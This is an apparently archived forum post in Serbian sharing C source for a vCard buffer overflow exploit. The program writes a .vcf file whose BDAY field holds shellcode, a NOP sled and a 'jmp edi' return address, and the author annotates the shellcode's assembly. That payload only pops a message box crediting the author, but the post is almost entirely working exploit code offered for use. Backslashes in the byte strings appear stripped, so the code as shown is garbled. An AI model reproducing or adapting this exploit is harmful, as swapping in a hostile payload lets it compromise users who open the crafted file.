[ kajla @ 29.07.2001. 23:54 ] @
Posto je bilo pitanja u vezi sa ovim exploit-om odlucio sam da ga postujem(nadam se da su komentari pregledni): Code: #include <stdio.h> main() { FILE *f; char eip[]="xc5x95x79x76"; /* jmp edi */ char shell_code[]= "x33xF6x68x2Ex41xF5xBFx56xC7x02x76x43x61x72xC7x42x04x64x20x65" "x78xC7x42x08x70x6Cx6Fx69xC7x42x0Cx74x20x62x79xC7x42x10x20x6B" "x61x6Ax89x72x14x66xC7x42x14x6Cx61x52x52x56xFFx54x24x10"; /* Ovaj shell_code sto sam napisao radi sledece: poziva MessageBoxA(0,"vCard exploit by kajla","vCard exploit by kajla",0) xor esi,esi push 0xBFF5412e ;adresa MessageBoxA() u user32.dll push esi mov dword ptr[edx],72614376h mov dword ptr[edx+04h],78652064h mov dword ptr[edx+08h],696f6c70h mov dword ptr[edx+0Ch],79622074h mov dword ptr[edx+010h],6a616b20h mov dword ptr[edx+014h],esi mov word ptr[edx+014h],616ch push edx push edx push esi call dword ptr[esp+010h] */ char nops[]="x90x90x90x90x90x90x90x90x90x90x90x90x90x90"; /* 14 NOPS */ char body_text[]= "BEGIN:VCARDn" "VERSION:2.1n" "N:;kajlan" "FN:kajlan" "BDAY:"; char end_text[]= "EMAIL;PREF;INTERNET:[email protected]" "REV:20010728T152652Zn" "END:VCARDn"; clrscr(); if ((f=fopen("vCard.vcf","w"))==NULL) { fprintf(stderr,"Cannot create file vCard.vcfn"); exit(1); } fprintf(f,"%s%s%s%sn%s",body_text,shell_code,nops,eip,end_text); fclose(f); printf("File: vCard.vcf created!"); getch(); return 0; } |